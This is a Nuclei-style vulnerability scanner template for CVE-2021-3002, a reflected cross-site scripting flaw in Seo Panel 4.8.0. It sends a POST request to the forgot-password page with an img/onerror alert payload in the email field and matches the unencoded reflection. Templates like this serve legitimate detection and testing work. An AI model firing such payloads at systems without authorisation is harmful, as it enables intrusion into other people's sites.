id: CVE-2021-3002

info:
  name: Seo Panel 4.8.0 - Cross-Site Scripting
  author: edoardottt
  severity: medium
  description: Seo Panel 4.8.0 contains a reflected cross-site scripting vulnerability via the seo/seopanel/login.php?sec=forgot email parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Upgrade to a patched version of Seo Panel or apply the necessary security patches provided by the vendor.
  reference:
    - http://www.cinquino.eu/SeoPanelReflect.htm
    - https://github.com/seopanel/Seo-Panel/issues/202
    - https://nvd.nist.gov/vuln/detail/CVE-2021-3002
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/ArrestX/--POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-3002
    cwe-id: CWE-79
    epss-score: 0.00143
    epss-percentile: 0.50151
    cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: "seopanel"
    product: seo_panel
  tags: cve2021,cve,seopanel,xss

http:
  - raw:
      - |
        POST /seo/seopanel/login.php?sec=forgot HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        sec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=

    matchers-condition: and
    matchers:
      # The response must be served as HTML for the reflected markup to be rendered.
      - type: word
        part: header
        words:
          - "text/html"

      # The email value from the request above must come back unencoded in the body,
      # on a page that also identifies itself as Seo Panel.
      - type: word
        part: body
        words:
          - "<img src=a onerror=alert(document.domain)>11"
          - "seopanel"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207872922b89deb4d4e30dde0efa9ef30c54bb0ef1d091394f09631a7fd52e9c43022100cb4b226864511a96ce4ad3068222e0a098b3713ab45c7e7232fda237659f5513:922c64590222798bb761d5b6d8e72950